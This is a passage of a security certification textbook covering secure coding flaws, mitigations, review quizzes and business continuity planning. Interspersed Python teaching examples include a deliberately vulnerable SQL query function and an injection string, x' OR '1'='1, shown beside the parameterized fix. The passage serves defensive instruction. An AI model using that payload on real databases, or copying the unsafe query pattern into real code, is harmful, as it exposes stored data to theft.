The concept behind these vulnerabilities is relatively simple. The input buffer that is used to hold program input is overwritten with data that is larger than the buffer can hold. The root cause of this vulnerability is a mixture of two things: poor programming practice and programming language weaknesses. For example, what would happen if a program that asks for a 7- to 10-character phone number instead receives a string of 150 characters? Many programs will provide some error checking to ensure that this will not cause a problem. Some programs, however, cannot handle this error, and the extra characters continue to fill memory, overwriting other portions of the program. This can result in a number of problems, including causing the program to abort or the system to crash. Under certain circumstances, the program can execute a command supplied by the attacker. Buffer overflows typically inherit the level of privilege enjoyed by the program being exploited. This is why programs that use root-level access are so dangerous when exploited with a buffer overflow, as the code that will execute does so at root-level access.

Programming languages such as C were designed for space and performance constraints. Many functions in C, like gets(), are unsafe in that they will permit unsafe operations, such as unbounded string manipulation into fixed buffer locations. The C language also permits direct memory access via pointers, a functionality that provides a lot of programming power but carries with it the burden of proper safeguards being provided by the programmer.

Exam Tip: Buffer overflows can occur in any code, and code that runs with privilege has an even greater risk profile. In 2014, a buffer overflow in the OpenSSL library, called Heartbleed, left hundreds of thousands of systems vulnerable and exposed critical data for tens to hundreds of millions of users worldwide.

Buffer overflows are input validation attacks, designed to take advantage of input routines that do not validate the length of inputs. Surprisingly simple to resolve, all that is required is the validation of all input lengths prior to writing to memory. This can be done in a variety of manners, including the use of safe library functions for inputs. This is one of the vulnerabilities that has been shown to be solvable, and in fact the prevalence is declining substantially among major security-conscious software firms.
Integer Overflow

An integer overflow is a programming error condition that occurs when a program attempts to store a numeric value, an integer, in a variable that is too small to hold it. The results vary by language and numeric type. In some cases, the value saturates the variable, assuming the maximum value for the defined type and no more. In other cases, especially with signed integers, it can roll over into a negative value, as the most significant bit is usually reserved for the sign of the number. This can create significant logic errors in a program.

Integer overflows are easily tested for, and static code analyzers can point out where they are likely to occur. Given this, there are not any good excuses for having these errors end up in production code.
Cross-Site Request Forgery

Cross-site request forgery (XSRF) attacks utilize unintended behaviors that are proper in defined use but are performed under circumstances outside the authorized use. This is an example of a "confused deputy" problem, a class of problems where one entity mistakenly performs an action on behalf of another. An XSRF attack relies upon several conditions to be effective. It is performed against sites that have an authenticated user and exploits the site's trust in a previous authentication event. Then, by tricking a user's browser to send an HTTP request to the target site, the trust is exploited. Assume your bank allows you to log in and perform financial transactions, but does not validate the authentication for each subsequent transaction. If a user is logged in and has not closed their browser, then an action in another browser tab could send a hidden request to the bank, resulting in a transaction that appears to be authorized but in fact was not done by the user.

There are many different mitigation techniques that can be employed, from limiting authentication times, to cookie expiration, to managing some specific elements of a web page like header checking. The strongest method is the use of random XSRF tokens in form submissions. Subsequent requests cannot work, as the token was not set in advance. Testing for XSRF takes a bit more planning than for other injection-type attacks, but this, too, can be accomplished as part of the design process.
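The bank scenario and the random-token mitigation described above, as an added example that is not code from the book: a minimal in-memory session store (constructed for this example) where a transfer trusted on the session cookie alone accepts a request another tab could have triggered, while the same request is refused once the form must carry the session's XSRF token.

```python
"""Per-session random XSRF token for form submissions.

Added example, not from the original text. BankSessions is a constructed
in-memory model of the bank in the text: the cookie proves an earlier login,
the token proves the form was rendered to this same session.
"""
import hmac
import secrets


class BankSessions:
    """Minimal session store: session id -> {"user": ..., "xsrf": ...}."""

    def __init__(self) -> None:
        self._sessions: dict = {}

    def login(self, user: str) -> str:
        """Returns the session id that would be set as the cookie."""
        sid = secrets.token_urlsafe(32)
        # Token is random, unguessable and bound to this one session.
        self._sessions[sid] = {"user": user, "xsrf": secrets.token_urlsafe(32)}
        return sid

    def xsrf_token(self, sid: str) -> str:
        """Embedded in the transfer form when the bank renders it."""
        return self._sessions[sid]["xsrf"]

    def transfer_without_token(self, cookie_sid: str, form: dict) -> str:
        """Weak design from the text: trusts the earlier login alone."""
        if cookie_sid not in self._sessions:
            return "denied: not logged in"
        return "ok: moved %s to %s" % (form["amount"], form["to"])

    def transfer_with_token(self, cookie_sid: str, form: dict) -> str:
        """Hardened: the form must carry the token issued to this session."""
        if cookie_sid not in self._sessions:
            return "denied: not logged in"
        expected = self._sessions[cookie_sid]["xsrf"].encode()
        supplied = str(form.get("xsrf", "")).encode()
        # Constant-time comparison so the check does not leak the token via timing.
        if not hmac.compare_digest(expected, supplied):
            return "denied: missing or wrong XSRF token"
        return "ok: moved %s to %s" % (form["amount"], form["to"])


def demo_transfers() -> dict:
    bank = BankSessions()
    sid = bank.login("alice")
    # A page in another tab cannot read alice's token, so a forged form
    # carries none, yet the browser still attaches her session cookie.
    forged = {"to": "mallory", "amount": "1000"}
    legit = {"to": "bob", "amount": "50", "xsrf": bank.xsrf_token(sid)}
    return {
        "forged_no_token_check": bank.transfer_without_token(sid, forged),
        "forged_with_token_check": bank.transfer_with_token(sid, forged),
        "legit_with_token_check": bank.transfer_with_token(sid, legit),
    }


if __name__ == "__main__":
    for name, outcome in demo_transfers().items():
        print("%-24s %s" % (name, outcome))
```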
Zero-Day

Zero-day is a term used to define vulnerabilities that are newly discovered and not yet addressed by a patch. Most vulnerabilities exist in an unknown state until discovered by a researcher or the developer. If a researcher or developer discovers a vulnerability but does not share the information, then this vulnerability can be exploited without a vendor's ability to fix it, because for all practical knowledge the issue is unknown, except to the person who found it. From the time of discovery until a fix or patch is made available, the vulnerability goes by the name zero-day, indicating that it has not been addressed yet. The most frightening thing about zero-days is the unknown factor—their capability and effect on risk are unknown.

Attachments

Attachments can also be used as an attack vector. If a user inputs a graphics file (for instance, a JPEG file), and that file is altered to contain executable code such as Java, then when the image is rendered, the code is executed. This can enable a wide range of attacks.

Locally Shared Objects

Locally shared objects (LSOs) are pieces of data that are stored on a user's machine to save information from an application, such as a game. Frequently these are cookies used by Adobe Flash, called Flash Cookies, and can store information such as user preferences. As these can be manipulated outside of the application, they can represent a security or privacy threat.

Client-Side Attacks

The web browser has become the major application for users to engage resources across the Web. Web-based attacks are covered in detail in Chapter 17.

Exam Tip: A wide variety of attack vectors can be used against a client machine, including cache poisoning, cross-site scripting, cross-user defacement, page hijacking, cookie manipulation, and open redirect. All attacks should be known for the exam.

Arbitrary/Remote Code Execution

One of the risks involved in taking user input and using it to create a command to be executed on a system is arbitrary or remote code execution. This attack involves an attacker preparing an input statement that changes the form or function of a prepared statement. A form of command injection, this attack can allow a user to insert arbitrary code and then remotely execute it on a system. This is a form of input validation failure, as users should not have the ability to change the way a program interacts with the host OS outside of a set of defined and approved methods.
Open Vulnerability and Assessment Language

The MITRE Corporation has done extensive research into software vulnerabilities. To enable collaboration between the many different parties involved in software development and maintenance, MITRE has developed a taxonomy of vulnerabilities, the Common Vulnerabilities and Exposures (CVE). This is just one of the many related enumerations that MITRE has developed, in an effort to make machine-readable data exchanges to facilitate system management across large enterprises. The CVE led to efforts such as the development of the Open Vulnerability and Assessment Language (OVAL). OVAL comprises two main elements: an XML-based machine-readable language for describing vulnerabilities, and a repository; see http://oval.mitre.org.

CVE provides security personnel with a common language to use when discussing vulnerabilities. If one is discussing a specific vulnerability in the Flash object that allows an arbitrary execution of code, then using the nomenclature CVE-2005-2628 records the specifics of the vulnerability and ensures everyone is discussing the same problem.

In addition to the CVE and OVAL efforts, MITRE has developed a wide range of enumerations and standards designed to ease the automation of security management at the lowest levels across an enterprise. Additional efforts include the following:

Common Attack Pattern Enumeration and Classification (CAPEC)
Extensible Configuration Checklist Description Format (XCCDF)
Security Content Automation Protocol (SCAP)
Common Configuration Enumeration (CCE)
Common Platform Enumeration (CPE)
Common Weakness Enumeration (CWE)
Common Event Expression (CEE)
Common Result Format (CRF)

The Common Weakness Enumeration (CWE) is important for secure development in that it enumerates common patterns of development that lead to weakness and potential vulnerabilities. Additional information can be obtained from the MITRE Making Security Measurable website, http://measurablesecurity.mitre.org.
Application Hardening

Application hardening works in the same fashion as system hardening (discussed in Chapter 14). The first step is the removal of unnecessary components or options. The second step is the proper configuration of the system as it is implemented. Every update or patch can change either of these conditions, so both should be confirmed after every update. The primary tools used to ensure a hardened system are a secure application configuration baseline and a patch management process. When properly employed, these tools yield a substantially more secure system than default settings and ad hoc patching.

Application Configuration Baseline

A baseline is the set of proper settings for a computer system. An application configuration baseline outlines the proper settings and configurations for an application or set of applications. These settings include many elements, from application settings to security settings. Protection of the settings is crucial, and the most common mechanisms used to protect them include access control lists and protected directories. The documentation of the desired settings is an important security document, assisting administrators in ensuring that proper configurations are maintained across updates; comparing the live configuration against it after each change is how drift is detected.
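The comparison that the paragraph above describes, checking a live configuration against a documented baseline after an update, as an added example (not code from the book). The baseline, the post-update settings and all of the key names are constructed for illustration; in practice both sides would be loaded from the application's own configuration store.

```python
"""Added example (not from the book): check a running application's
settings against a documented configuration baseline and report drift.
The baseline, the live settings and the key names are all constructed
for illustration; a real deployment would load them from its own
config store (for example a JSON file under version control)."""

# Constructed baseline: the approved value for every security-relevant
# setting. Keys not listed here are treated as unexpected additions.
BASELINE = {
    "debug": False,
    "tls_min_version": "1.2",
    "session_timeout_minutes": 15,
    "allowed_hosts": ["app.example.test"],
    "directory_listing": False,
}


def check_baseline(baseline, current):
    """Return a sorted list of (setting, problem, detail) tuples.

    problem is one of:
      "missing"    - baseline setting absent from the live config
      "mismatch"   - live value differs from the approved value
      "unexpected" - live setting that the baseline does not cover
    An empty list means the live configuration matches the baseline.
    """
    findings = []
    for key, approved in baseline.items():
        if key not in current:
            findings.append((key, "missing", f"expected {approved!r}"))
        elif current[key] != approved:
            findings.append((key, "mismatch",
                             f"expected {approved!r}, found {current[key]!r}"))
    for key in current:
        if key not in baseline:
            findings.append((key, "unexpected", f"found {current[key]!r}"))
    return sorted(findings)


def is_compliant(baseline, current):
    """True only when there is no drift of any kind."""
    return not check_baseline(baseline, current)


# Constructed live configuration after a hypothetical update: debugging was
# re-enabled, the TLS floor regressed, one setting vanished and a new
# option appeared that the baseline has never reviewed.
CURRENT_AFTER_UPDATE = {
    "debug": True,
    "tls_min_version": "1.0",
    "session_timeout_minutes": 15,
    "allowed_hosts": ["app.example.test"],
    "legacy_auth": True,
}

if __name__ == "__main__":
    for setting, problem, detail in check_baseline(BASELINE, CURRENT_AFTER_UPDATE):
        print(f"{problem:10} {setting}: {detail}")
```

Settings the baseline does not mention are reported as well; an option that appears out of nowhere after a patch is exactly the kind of change that has to be reviewed and either added to the baseline or disabled.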
Application Patch Management

Application patch management is a fundamental component of application and system hardening. The objective is to be running the most secure version of an application, and, with very few exceptions, that would be the most current version of the software, including patches. Most updates and patches include fixes for security issues and close vulnerabilities. Current patching is a requirement of many compliance schemes as well. Patching does not always go as planned, and some patches may result in problems in production systems. A formal system of patch management is needed to test and implement patches in a change-controlled manner.

Exam Tip: Patch management might be referred to as update management, configuration management, or change management. Although these terms are not strictly synonyms, they might be used interchangeably on the exam.
NoSQL Databases vs. SQL Databases

Current programming trends include topics such as whether to use SQL databases or NoSQL databases. SQL databases are those that use Structured Query Language to manipulate items that are referenced in a relational manner in the form of tables. NoSQL refers to data stores that employ neither SQL nor relational table structures. Each system has its strengths and weaknesses, and both can be used for a wide range of data storage needs. SQL databases are by far the most common, with implementations by IBM, Microsoft, and Oracle being the major players. NoSQL databases tend to be purpose-built and lack many of the standards of existing databases. This has not stopped the growth of NoSQL databases in large-scale, well-resourced environments. The important factor in accessing data in a secure fashion is the correct employment of programming structures and frameworks to abstract the access process. Methods such as inline SQL generation coupled with input validation errors are a recipe for disaster in the form of SQL injection attacks. NoSQL stores are not immune: a query document assembled from untrusted input lets the attacker inject query operators in the same way that string concatenation lets them inject SQL.
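The "inline SQL generation" the text warns about, beside the parameterized query that removes the injection, as an added example (not code from the book). It uses Python's standard-library sqlite3 module against an in-memory database; the users table, its rows and the attacker string are constructed for illustration.

```python
"""Added example (not from the book): the inline SQL generation the text
warns about, beside the parameterized form that prevents SQL injection.
Uses the standard-library sqlite3 module with a constructed in-memory
users table; the table layout and sample rows are illustrative."""
import sqlite3


def make_db():
    """Create an in-memory database with a small constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    conn.commit()
    return conn


def find_user_unsafe(conn, name):
    """VULNERABLE: the user-supplied name is spliced straight into the SQL
    text, so quotes and operators in the input become part of the query."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """HARDENED: the query text is fixed and the value travels separately as
    a bound parameter, so it can never be parsed as SQL."""
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Constructed attacker input: closes the quoted string and appends a
# tautology so the WHERE clause matches every row.
INJECTION = "x' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("unsafe:", find_user_unsafe(conn, INJECTION))  # every user leaks
    print("safe:  ", find_user_safe(conn, INJECTION))    # no such user
```

Input validation would have caught this particular payload, but the parameterized query is the control that holds even when validation is incomplete, which is why the two are layered rather than treated as alternatives.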
Server-Side vs. Client-Side Validation

In a modern client/server environment, data can be checked for compliance with input/output requirements either on the server or on the client. There is one real advantage to verifying data elements on a client before sending them to the server: efficiency. Doing checks on the client saves a round-trip, and its delays, before a user can be alerted to a problem. This can improve the usability of software interfaces. The client is not, however, a suitable place to perform any critical value checks or security checks. The reasons for this are twofold. First, the client can change anything after the check, since the attacker controls the client. Second, the data can be altered while in transit or at an intermediary proxy. For all checks that are essential, either for business reasons or for security, the verification steps must be performed on the server side, where the data is free from unauthorized alteration. Client-side checks are a usability feature; security-relevant input validation counts only when it is performed on the server.

Exam Tip: All input validation should be performed on the server side of the client-server relationship, where it is free from outside influence and change.
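A server-side handler that re-validates a request even though the client claims to have checked it, as an added example (not code from the book). The request shape, the product catalog, the quantity limit and the field names (including the client's "client_validated" flag) are constructed for illustration.

```python
"""Added example (not from the book): a server-side handler that re-validates
an order even though the client claims to have checked it already. The
request shape, the catalog and the limits are constructed for illustration."""

# Constructed server-side catalog: the only source of truth for prices.
CATALOG = {"widget": 1999, "gadget": 4950}   # prices in cents
MAX_QUANTITY = 100


class ValidationError(ValueError):
    """Raised when the server rejects a request, whatever the client claimed."""


def validate_order(request):
    """Validate a decoded JSON order on the server and return the trusted
    (sku, quantity, total_cents) tuple, or raise ValidationError.

    Fields the client asserts about itself ("client_validated") and values
    the client could have tampered with ("unit_price") are ignored; the
    server recomputes everything it relies on."""
    sku = request.get("sku")
    if not isinstance(sku, str) or sku not in CATALOG:
        raise ValidationError("unknown sku")
    qty = request.get("quantity")
    # bool is a subclass of int in Python; reject it explicitly.
    if isinstance(qty, bool) or not isinstance(qty, int):
        raise ValidationError("quantity must be an integer")
    if not 1 <= qty <= MAX_QUANTITY:
        raise ValidationError("quantity out of range")
    total = CATALOG[sku] * qty          # server price, never request["unit_price"]
    return sku, qty, total


# Constructed requests: a legitimate one and two tampered with after the
# browser-side checks ran (a negative quantity, and a rewritten price).
GOOD = {"sku": "widget", "quantity": 2, "unit_price": 1999, "client_validated": True}
TAMPERED_QTY = {"sku": "widget", "quantity": -5, "client_validated": True}
TAMPERED_PRICE = {"sku": "gadget", "quantity": 1, "unit_price": 1, "client_validated": True}

if __name__ == "__main__":
    print(validate_order(GOOD))
    for bad in (TAMPERED_QTY, TAMPERED_PRICE):
        try:
            print(validate_order(bad))
        except ValidationError as exc:
            print("rejected:", exc)
```

The rewritten price is not "rejected" so much as ignored: the server never reads it, so there is nothing for the attacker to influence. Any value the server actually uses is either recomputed or checked there.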
Chapter 18 Review

For More Information
SAFECode www.safecode.org
DHS Build Security In https://buildsecurityin.us-cert.gov
Microsoft SDL www.microsoft.com/sdl
CVE http://cve.mitre.org
CWE http://cwe.mitre.org
CWE/SANS Top 25 http://cwe.mitre.org/top25/index.html

Chapter Summary

After reading this chapter and completing the exercises, you should understand the following about security issues related to software development.

Describe how secure coding can be incorporated into the software development process
• The requirements phase is the most important part of the software engineering process since it outlines the project's future requirements, thus defining its scope and limitations.
• The use of an enhanced lifecycle development process that includes security elements will build security into the product.

List the major types of coding errors and their root causes
• The most common coding error is a buffer-overflow condition.
• Code injection errors can result in the execution of code supplied by the end user.
• Input validation is the best method of protecting against buffer overflows and code injection errors.

Describe good software development practices and explain how they impact application security
• Early testing helps resolve errors at an earlier stage and results in cleaner code.
• Security-related use cases can be used to test for specific security requirements.
• Fuzz testing can find a wide range of errors.

Describe how using a software development process enforces security inclusion in a project
• Security is built into the software by including security concerns and reviews throughout the software development process.
• Regardless of the specific software engineering process model used, security can be included in the normal process by being input as requirements.

Learn about application hardening techniques
• The first step in application hardening is determining the application configuration baseline.
• Applications require patching as well as the OS, and proper enterprise application patch management is important.
• All validation of client-to-server data needs to be done on the server side, for this is the side of the communication whose security can be controlled.

Key Terms
agile model, black-box testing, buffer overflow, canonicalization error, code injection, Common Vulnerabilities and Exposures (CVE), Common Weakness Enumeration (CWE), cryptographically random, CWE/SANS Top 25 Most Dangerous Software Errors, deprecated function, evolutionary model, fuzzing, grey-box testing, least privilege, requirements phase, secure development lifecycle (SDL) model, spiral model, SQL injection, testing phase, Top 25 list, use case, waterfall model, white-box testing, zero-day
Key Terms Quiz

Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.

1. The _______________ is a linear software engineering model with no repeating steps.
2. A(n) _______________ causes an application to malfunction due to a misrepresented name for a resource.
3. CWE-20: Improper Input Validation refers to a(n) _______________.
4. Using a series of malformed inputs to test for conditions such as buffer overflows is called _______________.
5. Modifying a SQL statement through false input to a function is an example of _______________.
6. Using an administrator-level account for all functions is a violation of the principle of _______________.
7. The _______________ is the first opportunity to address security functionality during a project.
8. The banning of _______________ helps improve code quality by using safer library calls.
9. A(n) _______________ is a vulnerability that is known to attackers but not yet to the developers of the software.
10. A number that is suitable for an encryption function is called _______________.
Multiple-Choice Quiz

1. Which of the following is not related to a buffer overflow?
A. Static buffer overflow
B. Index error
C. Canonicalization error
D. Heap overflow

2. Which of the following is not involved with a code injection error?
A. SQL statement building
B. Input validation
C. JavaScript
D. A pointer in the C language

3. Input validation is important to prevent what?
A. Buffer overflow
B. Index sequence error
C. Operator overload error
D. Unhandled exception

4. It's most important to define security requirements during:
A. Testing
B. Use case development
C. Code walkthroughs
D. The requirements phase of the project

5. The largest class of errors in software engineering can be attributed to:
A. Poor testing
B. Privilege violations
C. Improper input validation
D. Canonicalization errors

6. Least privilege applies to:
A. Only the application code
B. Only calls to operating system objects
C. All resource requests from applications to other entities
D. Applications under named user accounts

7. Common cryptographic failures include which of the following?
A. Use of cryptographically random numbers
B. Cryptographic sequence failures
C. Poor encryption protocols
D. Canonicalization errors

8. When is testing best accomplished?
A. After all code is finished
B. As early as possible in the process
C. Using cryptographically random elements
D. Using third-party testing software

9. Code review by a second party is helpful to do what?
A. Increase creativity of the junior programmer
B. Reduce cost, making for a better, cheaper method of testing
C. Catch errors early in the programming process
D. Ensure all modules work together

10. One of the most fundamental rules of good coding practice is:
A. Code once, test twice.
B. Validate all inputs.
C. Don't use pointers.
D. Use obscure coding practices so viruses cannot live in the code.
Essay Quiz

1. Describe the relationship of the requirements phase, testing phase, and use cases with respect to software engineering development and secure code.
2. Develop a list of five security-related issues to be put into a requirements document as part of a secure coding initiative.
3. Choose two requirements from the previous question and describe use cases that would validate them in the testing phase.
4. You have been asked by your manager to develop a worksheet for code walkthroughs, another name for structured code reviews. This worksheet should include a list of common errors to look for during the examination, acting as a memory aid. You want to leave a lasting impression on the team as a new college grad. Outline what you would include on the worksheet related to security.

Lab Projects

• Lab Project 18.1 Learn the specific software engineering process model used at a local firm (or you may be able to research a company online or find one in a software engineering textbook at a library). Examine where security is built, or could be built, into the model. Provide an overview of the strengths and opportunities of the model with respect to designing secure code.
• Lab Project 18.2 Develop an example of a SQL injection statement for a web page inquiry. List the web page inputs, what the projected back-end SQL is, and how it can be changed.
Chapter 19 Business Continuity and Disaster Recovery, and Organizational Policies

The superior man, when resting in safety, does not forget that danger may come. When in a state of security he does not forget the possibility of ruin. When all is orderly, he does not forget disorder may come. Thus his person is not endangered and his States and all their clans are preserved.
—CONFUCIUS

In this chapter, you will learn how to
Describe the various components of a business continuity plan
Describe the elements of disaster recovery plans
Describe the various ways backups are conducted and stored
Explain different strategies for alternative site processing

Much of this book focuses on avoiding the loss of confidentiality or integrity due to a security breach. The issue of availability is also discussed in terms of specific events, such as denial-of-service and distributed DoS attacks. In reality, however, there are many things that can disrupt the operations of your organization. From the standpoint of your clients and employees, whether your organization's website is unavailable because of a storm or because of an intruder makes little difference; the site is still unavailable. In this chapter, we'll discuss what to do when a situation arises that results in the disruption of services. This discussion includes both disaster recovery and business continuity.
Business Continuity

Keeping an organization running when an event occurs that disrupts operations is not accomplished spontaneously but requires advance planning and periodically exercising those plans to ensure they will work. A term that is often used when discussing the issue of continued organizational operations is business continuity (BC).

Exam Tip: The terms DR and BC are often used synonymously and sometimes together as in BC/DR, but there are subtle differences between them. Study this section carefully to ensure that you can discriminate between the two terms.

There are many risk management best practices associated with business continuity. The topics of planning, business impact analysis, identification of critical systems and components, single points of failure, and more are detailed in the following sections.

Business Continuity Plans

As in most operational issues, planning is a foundational element of success. This is true in business continuity, and the business continuity plan (BCP) represents the planning and advance policy decisions to ensure the business continuity objectives are achieved during a time of obvious turmoil. You might wonder what the difference is between a disaster recovery plan and a business continuity plan; after all, isn't the purpose of disaster recovery the continued operation of the organization or business during a period of disruption? These two terms are often used synonymously, and for many organizations there may be no major difference between the two. There are, however, real differences between a BCP and a DRP, one of which is the focus. The focus of a BCP is the continued operation of the essential elements of the business or organization. Business continuity is not about operations as normal, but rather about trimmed-down, essential operations only. Like life support, it is good for a period to buy time to recover, but it is not a leaner way of running the operation. The focus of a DRP is on the recovery and rebuilding of the organization after a disaster has occurred, and this recovery is all the way back to complete operation of all elements of the business. The DRP is part of the larger picture, while the BCP is a tactical necessity until operations can be restored. A major focus of the DRP is the protection of human life. Evacuation plans and system shutdown procedures should be addressed. The safety of employees should be a theme throughout a DRP. In a BCP, you will see a more significant emphasis placed on the limited number of critical systems the organization needs to operate. The BCP will describe the functions that are most critical, based on a previously conducted business impact analysis, and will describe the order in which functions should be returned to operation. The BCP describes what is needed in order for the business to continue to operate in the short term, even if all requirements are not met and risk profiles are changed.
Business Impact Analysis

Business impact analysis (BIA) is the term used to describe the document that details the specific impact of elements on a business operation (this may also be referred to as a business impact assessment). A BIA outlines what the loss of any of your critical functions will mean to the organization. The BIA is a foundational document used to establish a wide range of priorities, including system backups and restoration, which are needed in maintaining continuity of operation, and more. While each person may consider their individual tasks to be important, the BIA is a business-level analysis of the criticality of all elements with respect to the business as a whole. The BIA will take into account the increased risk from minimal operations, and is designed to determine and justify what is essentially critical for a business to survive versus what someone may state or wish.

Conducting a BIA is a critical part of developing your DRP. This assessment will allow you to focus on the most critical elements of your organization. These critical elements are the ones that you want to ensure are recovered first, and this priority should be reflected in your DRP.

Identification of Critical Systems and Components

A foundational element of a security plan is an understanding of the criticality of systems, the data, and the components. Identifying the critical systems and components is one of the first steps an organization needs to undertake in designing the set of security controls. As the systems evolve and change, the continued identification of the critical systems needs to occur, keeping the information up-to-date and current.

Removing Single Points of Failure

A key security methodology is to attempt to avoid a single point of failure in critical functions within an organization. When developing your BCP, you should be on the lookout for areas in which a critical function relies on a single item (such as switches, routers, firewalls, power supplies, software, or data) that if lost would stop this critical function. When these points are identified, think about how each of these possible single points of failure can be eliminated (or mitigated). In addition to the internal resources you need to consider when evaluating your business functions, there are many resources external to your organization that can impact the operation of your business. You must look beyond hardware, software, and data to consider how the loss of various critical infrastructures can also impact business operations.

Risk Assessment

The principles of risk assessment can be applied to business continuity planning. Determining the sources and magnitudes of risks is necessary in all business operations, including business continuity planning.

Succession Planning

Business continuity planning is more than just ensuring that hardware is available and operational. The people who operate and maintain the system are also important, and in the event of a disruptive event, the availability of key personnel is as important as hardware for successful business continuity operations. The development of a succession plan that identifies key personnel and develops qualified personnel for key functions is a critical part of a successful BCP.

Exam Tip: Business continuity is not only about hardware; plans need to include people as well. Succession planning is a proactive plan for personnel substitutions in the event that the primary person is not available to fulfill their assigned duties.

Continuity of Operations

The continuity of operations is imperative, as it has been shown that businesses that cannot quickly recover from a disruption have a real chance of never recovering, and they may go out of business. The overall goal of business continuity planning is to determine which subset of normal operations needs to be continued during periods of disruption.
Disaster Recovery

Many types of disasters, whether natural or caused by people, can disrupt your organization's operations for some length of time. Such disasters are unlike threats that intentionally target your computer systems and networks, such as industrial espionage, hacking, attacks from disgruntled employees, and insider threats, because the events that cause the disruption are not specifically aimed at your organization. Although both disasters and intentional threats must be considered important in planning for disaster recovery, the purpose of this section is to focus on recovering from disasters. How long your organization's operations are disrupted depends in part on how prepared it is for a disaster and what plans are in place to mitigate the effects of a disaster. Any of the following events could cause a disruption in operations:

Fortunately, these types of events do not happen frequently in any one location. It is more likely that business operations will be interrupted due to employee error (such as accidental corruption of a database or unplugging a system to plug in a vacuum cleaner, an event that has occurred at more than one organization). A good disaster recovery plan will prepare your organization for any type of organizational disruption.

Disasters can be caused by nature (such as fires, earthquakes, and floods) or can be the result of some manmade event (such as war or a terrorist attack). The plans an organization develops to address a disaster need to recognize both of these possibilities. While many of the elements in a disaster recovery plan will be similar for both natural and manmade events, some differences might exist. For example, recovering data from backup tapes after a natural disaster can use the most recent backup available. If, on the other hand, the event was a loss of all data as a result of a computer virus that wiped your system, restoring from the most recent backup tapes might result in the reinfection of your system if the virus had been dormant for a planned period of time. In this case recovery might entail restoring some files from earlier backups.
Disaster Recovery Plans/Process

No matter what event you are worried about, whether natural or not, targeted at your organization or not, you can make preparations to lessen the impact on your organization and the length of time that your organization will be out of operation. A disaster recovery plan (DRP) is critical for effective disaster recovery efforts. A DRP defines the data and resources necessary and the steps required to restore critical organizational processes. Consider what your organization needs to perform its mission. This information provides the beginning of a DRP, since it tells you what needs to be quickly restored. When considering resources, don't forget to include both the physical resources (such as computer hardware and software) and the personnel (the people who know how to run the systems that process your critical data). To begin creating your DRP, first identify all critical functions for your organization, and then answer the following questions for each of these critical functions:

Who is responsible for the operation of this function?
What do these individuals need to perform the function?
When should this function be accomplished relative to other functions?
Where will this function be performed?
How is this function performed (what is the process)?
Why is this function so important or critical to the organization?

By answering these questions, you can create an initial draft of your organization's DRP. The name often used to describe the document created by addressing these questions is a business impact assessment (BIA). Both the DRP and the BCP, of course, will need to be approved by management, and it is essential that they buy into the plan; otherwise your efforts will more than likely fail. The old adage "Those who fail to plan, plan to fail" certainly applies in this situation. A good DRP must include the processes and procedures needed to restore your organization to proper functioning and to ensure continued operation. What specific steps will be required to restore operations? These processes should be documented and, where possible and feasible, reviewed and exercised on a periodic basis. Having a plan with step-by-step procedures that nobody knows how to follow does nothing to ensure the continued operation of the organization. Exercising your DRP and processes before a disaster occurs provides you with the opportunity to discover flaws or weaknesses in the plan when there is still time to modify and correct them. It also provides an opportunity for key figures in the plan to practice what they will be expected to accomplish.

It is often very informative to determine what category your various business functions fall into. You may find that certain functions currently being conducted are not essential to your operations and could be eliminated. In this way, preparing for a security event may actually help you streamline your operational processes.

Categories of Business Functions

In developing your BIA and DRP, you may find it useful to categorize the various functions your organization performs, such as shown in Table 19.1. This categorization is based on how critical or important the function is to your business operation and how long your organization can last without the function. Those functions that are the most critical will be restored first, and your DRP should reflect this. If the function doesn't fall into any of the first four categories, then it is not really needed and the organization should seriously consider whether it can be eliminated altogether.

Table 19.1 DRP Considerations

The difference between a DRP and a BCP is that the BCP will be used to ensure that your operations continue in the face of whatever event has occurred that has caused a disruption in operations. If a disaster has occurred and has destroyed all or part of your facility, the DRP portion of the BCP will address the building or acquisition of a new facility. The DRP can also include details related to the long-term recovery of the organization. However you view these two plans, an organization that is not able to quickly restore business functions after an operational interruption is an organization that will most likely suffer an unrecoverable loss and may cease to exist.
Tech Tip

DRP vs. BCP
Although the terms DRP and BCP may be used synonymously in small firms, in large firms there is a difference in focus between the two plans. The focus of the BCP is on continued operation of a business, albeit at a reduced level or through different means during some period of time. The DRP is focused specifically on recovering from a disaster. In many cases, both of these functions happen at the same time, and hence they are frequently combined in small firms and in many discussions. In large, complex entities, they are separate plans used to provide management options for a range of situations.
IT Contingency Planning

Important parts of any organization today are the information technology (IT) processes and assets. Without computers and networks, most organizations could not operate. As a result, it is imperative that a BCP includes IT contingency planning. Due to the nature of the Internet and the threats that come from it, an organization's IT assets will likely face some level of disruption before the organization suffers from a disruption due to a natural disaster. Events such as viruses, worms, computer intruders, and denial-of-service attacks could result in an organization losing part or all of its computing resources without warning. Consequently, the IT contingency plans are more likely to be needed than the other aspects of a BCP. These plans should account for disruptions caused by any of the security threats discussed throughout this book as well as disasters or simple system failures.
Test, Exercise, and Rehearse

An organization should practice its DRP periodically. The time to find out whether it has flaws is not when an actual event occurs and the recovery of data and information means the continued existence of the organization. The DRP should be tested to ensure that it is sufficient and that all key individuals know their role in the specific plan. A test determines whether the organization's plan and the individuals involved perform as they should during a simulated security incident. A test implies a "grade" will be applied to the outcome. Did the organization's plan and the individuals involved perform as they should? Was the organization able to recover and continue to operate within the predefined tolerances set by management? If the answer is no, then during the follow-up evaluation of the exercise, the failures should be identified and addressed. Was it simply a matter of untrained or uninformed individuals, or was there a technological failure that necessitates a change in hardware, software, or procedures?

Whereas a test implies a "grade," an exercise can be conducted without the stigma of a pass/fail grade being attached. Security exercises are conducted to provide the opportunity for all parties to practice the procedures that have been established to respond to a security incident. It is important to perform as many of the recovery functions as possible, without impacting ongoing operations, to ensure that the procedures and technology will work in a real incident. You may want to periodically rehearse portions of the recovery plan, particularly those aspects that either are potentially more disruptive to actual operations or require more frequent practice because of their importance or degree of difficulty.

